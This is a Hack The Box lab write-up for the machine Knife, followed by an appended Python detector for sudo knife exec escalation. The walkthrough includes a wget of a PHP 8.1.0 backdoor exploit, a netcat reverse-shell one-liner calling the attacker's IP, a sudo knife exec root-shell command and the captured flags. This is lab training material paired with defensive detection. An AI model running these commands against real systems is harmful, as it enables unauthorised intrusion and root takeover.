
HACK THE BOX

MACHINE-KNIFE

SUBMITTED BY
VIVEK A

PENETRATION TEST METHODS


- SCANNING
- ENUMERATION
- EXPLOITATION
- PRIVILEGE ESCALATION

The IP address of the target machine is 10.10.10.242


1. SCANNING
Now we need to scan this machine for vulnerabilities. For that we use the Nmap command.

sudo nmap -sS -A 10.10.10.242

2. ENUMERATION
We opened port 80 and the website loaded, but there is nothing we can do on this website.

Next we looked for “robot.txt”, but the requested URL was not found.

Then we used a tool called Wappalyzer to enumerate further. Using that tool, we got the PHP version of the website as 8.1.0.
I searched for an exploit for PHP 8.1.0 and found the program file for exploitation.

Then, using wget, I downloaded the program file and renamed it to a Python file.
wget https://www.exploit-db.com/raw/49933

3. EXPLOITATION
Then I ran the Python file and exploited the target machine.
python file.py

After exploiting this machine, I still couldn’t perform any operations. So, to continue, I used another tool called Netcat to exploit further.

Then, in the previous terminal in which Python was running, I entered the following code.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.75 1234 >/tmp/f
This code is entered to move further using Netcat.

As soon as the code was entered, we moved further.

As I looked into the home directory on the system, I found the user directory JAMES and the user flag.
3996b98220f1bb8b675640e9f5086408

4. PRIVILEGE ESCALATION
Using the command below, we try to get root access.
sudo /usr/bin/knife exec --exec "exec '/bin/bash -i'"

At last we got root access and found the root flag.
1ce3e62bc3d0600f691e21eb4a41a411

Finally, the machine KNIFE is successfully completed.
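
The sudo knife exec step from section 4 leaves a record in the sudo log, which a defender can search for. The detection sketch below is an added example, not part of the original write-up; the log lines, host name and timestamps are constructed, and the record layout assumed is sudo's default syslog format.

```python
import re

# Syslog-style sudo record (assumed default layout):
#   "... sudo:  user : TTY=... ; PWD=... ; USER=... ; COMMAND=..."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)
# "knife exec" evaluates caller-supplied Ruby, so under sudo it is root code execution.
KNIFE_EXEC_RE = re.compile(r"(^|/)knife\s+exec\b")
# A shell path inside the command means the Ruby code was used to spawn a shell.
SHELL_RE = re.compile(r"/bin/(ba|da|z)?sh\b")


def find_knife_escalations(lines):
    """Return one finding per sudo record where knife exec ran as root."""
    findings = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m or m["runas"] != "root":
            continue
        cmd = m["cmd"].strip()
        if not KNIFE_EXEC_RE.search(cmd):
            continue
        findings.append({
            "user": m["user"],
            "command": cmd,
            "severity": "high" if SHELL_RE.search(cmd) else "medium",
        })
    return findings


# Constructed sample log lines (host name and timestamps are made up).
SAMPLE_LOG = [
    "Jun  1 10:14:40 knife sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife --version",
    "Jun  1 10:15:02 knife sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife exec --exec exec '/bin/bash -i'",
    "Jun  1 10:16:30 knife sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update",
    "Jun  1 10:17:11 knife sudo:    james : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/knife exec /tmp/report.rb",
]

if __name__ == "__main__":
    for f in find_knife_escalations(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['user']} -> {f['command']}")
```

Any finding means the account holds a sudo rule for knife; removing that rule, or restricting it to fixed non-exec subcommands, closes the path used in section 4.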